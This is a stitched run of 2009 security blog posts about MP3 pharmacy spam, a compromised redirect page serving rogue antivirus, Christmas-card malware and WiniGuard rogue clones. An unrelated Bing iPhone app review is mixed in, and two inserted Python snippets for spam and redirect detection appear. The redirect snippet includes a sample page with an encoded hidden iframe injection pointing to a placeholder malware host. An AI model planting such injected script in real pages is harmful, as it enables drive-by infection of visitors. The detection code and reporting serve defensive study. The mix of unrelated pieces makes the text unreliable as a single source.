Starting at ~3:20pm GMT today, Canadian Pharmacy spammers began using attached MP3 files as the call-to-action for their latest campaign. The message had no subject, no “text” body content, just an attached “audio/mpeg” file with a random lower case file name.

Upon playing the attached mp3 file, you find out why I called it the “call-to-action”. A robotic sounding woman’s voice reads off the URL they would like recipients to browse to (letter by letter), with porn-like moaning as background noise. I guess they are going for the often used spam tactic of tying ED pills (Viagra, Cialis, etc..) to porn star-like performance in bed.

Here is a re-encoded sample:


Canadian Pharmacy Waveform
Previous runs from these spammers took the more typical “Image spam” form (an attached JPEG). Example:

Canadian Pharmacy JPEG example

I am aware of at least one other spam run using attached MP3s, but you would have to go all the way back to 2007: Stock spammers pump up the volume with MP3 files

Yet another example of how willing spammers are to try anything to hide the content of their campaigns from filters. However in this case, I would suspect this technique won’t last for long as the likelihood of recipients opening some blank message with just an attachment, from an unknown sender, is quite low. That said, remembering back to the “Summer of PDF spam” (June/July/August of 2007 where 10-40% of all spam had attached PDFs) suggests they may not care if very few recipients open their spam.
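As an added example (not code from the original post), a mail-filter heuristic in Python that scores the traits described above: no subject, no text body, and a single audio/mpeg attachment with a random all-lowercase filename. Both sample messages are constructed for the demonstration; the thresholds and the filename pattern are assumptions.

```python
import email
import re
from email import policy

# Constructed samples (not real captures): SUSPECT_RAW mimics the run described
# above; LEGIT_RAW is an ordinary message with an MP3 attached, for contrast.
SUSPECT_RAW = b"""Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: audio/mpeg; name="qwhzptk.mp3"
Content-Disposition: attachment; filename="qwhzptk.mp3"

SUQzAwAAAAAAAA==
--b1--
"""
LEGIT_RAW = b"""Subject: Recording from today's meeting
Content-Type: multipart/mixed; boundary="b2"

--b2
Content-Type: text/plain

The audio from the standup is attached, as discussed.
--b2
Content-Type: audio/mpeg; name="standup-2009-12-17.mp3"
Content-Disposition: attachment; filename="standup-2009-12-17.mp3"

SUQzAwAAAAAAAA==
--b2--
"""
# Filenames made of nothing but lowercase letters, as seen in this run (assumed pattern).
RANDOM_NAME = re.compile(r"^[a-z]{4,16}\.mp3$")

def audio_spam_indicators(raw: bytes) -> list:
    """Return the heuristic indicators that fire for one raw RFC 822 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    indicators = []
    if not (msg.get("Subject") or "").strip():
        indicators.append("empty-subject")
    parts = [p for p in msg.walk() if not p.is_multipart()]
    texts = [p for p in parts if p.get_content_maintype() == "text"]
    audios = [p for p in parts if p.get_content_type() == "audio/mpeg"]
    if not any(p.get_content().strip() for p in texts):
        indicators.append("no-text-body")
    if any(RANDOM_NAME.match(p.get_filename() or "") for p in audios):
        indicators.append("random-lowercase-filename")
    if len(audios) == 1 and not texts:
        indicators.append("lone-audio-attachment")
    return indicators

def is_audio_spam(raw: bytes) -> bool:
    # Several indicators must fire together; one oddity alone is not enough.
    return len(audio_spam_indicators(raw)) >= 3
```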

Who’s the quickest? Only one way to find out…

Earlier this morning I noticed a redirect page used in a meds spam campaign that had also been compromised with a malicious script.


You can see the META tag redirect that instructs the browser to immediately load the page on the target site.
Immediately below it is the obfuscated JavaScript injected into the page. Deobfuscating this script, we can see its payload is also a redirection, this time to a malware site.


Curiosity got the better of me. Which payload ‘wins’ when the browser loads the page? The META redirect or the JavaScript? Only one way to find out…

Ok, not quite Harry Hill, but I loaded the page with Internet Explorer on a test machine to find out. It appears that the malicious script has precedence over the META redirect, and the iframe payload was delivered. Unfortunately, not a happy ending - infection with rogue security software.





Definitely one scenario where you would have been better off with our Canadian Health friends at the end of the META redirect.
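As an added example, not part of the original post, a small Python auditor that pulls both redirect mechanisms out of a page like the one described: the META refresh target and any URL hidden inside percent-encoded (unescape-style) inline script. The sample page, its .example hosts and the obfuscation hint list are constructed for the demonstration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed sample (not the page the post analysed): a META refresh to the
# spam landing site plus an injected document.write() of a percent-encoded iframe.
SAMPLE_HTML = """<html><head>
<meta http-equiv="refresh" content="0;url=http://pharmacy-landing.example/">
<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A//malware-host.example/x%22%20width%3D0%20height%3D0%3E%3C/iframe%3E"))</script>
</head><body>Loading...</body></html>"""

OBFUSCATION_HINTS = ("unescape(", "eval(", "fromCharCode", "document.write(")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")

class RedirectAuditor(HTMLParser):
    """Collect META refresh targets and the text of every inline script."""
    def __init__(self):
        super().__init__()
        self.meta_refresh, self.scripts, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = re.search(r"url\s*=\s*(\S+)", a.get("content") or "", re.I)
            if m:
                self.meta_refresh.append(m.group(1).strip("'\""))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.scripts.append(data)

def audit(html: str) -> dict:
    p = RedirectAuditor()
    p.feed(html)
    findings = {"meta_refresh": p.meta_refresh, "script_targets": [], "hints": []}
    for s in p.scripts:
        findings["hints"].extend(h for h in OBFUSCATION_HINTS if h in s)
        # unescape()-style encoding decodes with unquote; the decoded text is
        # searched for the URLs the script would load. Inline scripts run as the
        # parser reaches them, before a 0-second refresh fires, which matches
        # the ordering observed above.
        findings["script_targets"].extend(URL_RE.findall(unquote(s)))
    return findings
```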



Do you want Bing for iPhone? There's an app for that

Earlier this evening, Microsoft formally announced a new search app for iPhone on the Bing Community blog. The Bing app is available now from the App Store, complete with voice search. I emphasize the now because the App Store lists a December 16 release date for the app, and it is still the 15th.

Based on a very quick, cursory look, Bing is a competent iPhone app, tapping into the kind of capabilities expected from the platform. Bing fits nicely into the App Store repertoire. I wouldn't call the features revolutionary -- Apple and Google are there already with advanced mapping and GPS -- but the packaging appeals, and Microsoft manages to offer a user experience that is fairly consistent with Bing Web search.

"Our investments in voice search (you may have played with them on Windows phones or BlackBerry already) continues in our iPhone App and works great for map locations as well as old fashioned web search," according to the Microsoft blog post announcing Bing for iPhone. "Just say 'San Francisco weather,' for a quick result, or even say a full address for a map or directions. Try something complex, like '1 Microsoft Way, Redmond 98052.' (Yes, I know how to get to work.) Hold the phone to your ear and speak, or press the mic button -- simple."

Google's iPhone search app also supports voice search, which is prominently available on Android phones. Voice search is a great utility and demonstrates how natural user interfaces can greatly improve the smartphone data experience compared to PCs. I would -- again, from a quick look -- pick Bing voice search over Google on iPhone, but find Google's voice search in Android to be more appealing.



Microsoft also touts location search tied to mapping and GPS: "Speaking of directions (ha), looking for a coffee shop nearby? Bing automatically finds your location. It's also easy to discover a new spot by category such as restaurants, banks, theaters and choose whether you want walking or driving directions."

Location-awareness isn't exactly new to iPhone, but at least Microsoft offers an alternative to the Google Maps functionality built into the device. The mapping feature looks promising, but will require more testing for proper evaluation. The visuals impress, at least. Still, regardless of merits, Bing mapping features are Google catchups.



The Bing home screen is nicely laid out, and it comes with the expected background image typically found on the Website search page. Categories like businesses, directions, movies or maps help simplify search. Clearly there is emphasis on local search, which absolutely is the right priority. I love the photo search, by the way. Presentation is simply awesome.



Many pundits will quip about how Microsoft is conceding something by releasing an iPhone app and not keeping Bing solely for Windows Mobile. Microsoft already offers a Bing search app for other mobile platforms, and even more supported platforms is the right strategy. Search is the future of mobile phones -- and any advertising packaged along with it. Microsoft had better be there or be square. Bing search should be available for all mobile platforms. Bing for iPhone is smart business. The concession would be keeping Bing only for Windows Mobile.

Early end user App Store reviews are positive (I won't guess how many are Microsoft employees). Commenter Xuedonghuang writes: "It's a great Christmas gift from Microsoft."

Merry Christmas, Idiot

It's not a huge surprise that we are seeing some malware spam runs where the malicious attachment attempts to portray itself as a Christmas Greeting of some sort.

Here's an example from today (md5: C670165AE6DFA8318F0EA795B1D3AD55). This one is actually a Zapchast (IRC bot variant).

The "Christmas Card" requires its own "special version" of Flash to be installed — flashplayer2009.exe — which is the malware itself.

Once ready, it will display this friendly message written in Universal Gibberish.



Pay attention to the cheerful filename used for this message — idiot.jpg.

Wednesday, December 16, 2009

Like clockwork: the next member of the WiniGuard rogue family appears

I blogged about the three generations of the WiniGuard family of rogue security products that began in October of 2008. Friday, the 50th rogue in that line appeared. Analyst Patrick Jordan noted that there appeared to be a newly named clone added to the “genealogy” about every 48 hours. He’s been right.

Monday they found GuardPCS and today they found TheDefender. Its associated web site was registered Dec. 4.

Fraudulent operators behind the rogues seem to be doing two things to confuse Internet users and lure them into purchasing this worthless scareware:
  • “Borrowing” content from legitimate anti-virus company web sites, such as certifications and management team pages, for their own web pages.
  • Distributing their rogues with different names and with redesigned graphic interfaces. They usually have web sites associated with the new name. They look like authentic security products, but, as the song said they “take the money and run.”

See our earlier blog entry about the WiniGuard family of rogues.

10 million people will you computers are perfectly safe

New rogue borrows massively from AV company sites

Our friend M.N. Bharath drew our attention to this web site associated with the new System Adware Scanner 2010 rogue security product. Although the group claims 10 million users world-wide, oddly enough their site was only registered Nov. 25.

It seems they also have recruited the entire management team from AVG anti-virus company as well. Right!

Compare the names on the Smart Systems Technologies rogue page.



with AVG’s: http://www.avg.com/us-en/management-team



If that isn’t enough to raise your suspicions, check out the Engrish on this page: http://sysadscanner.com/why.php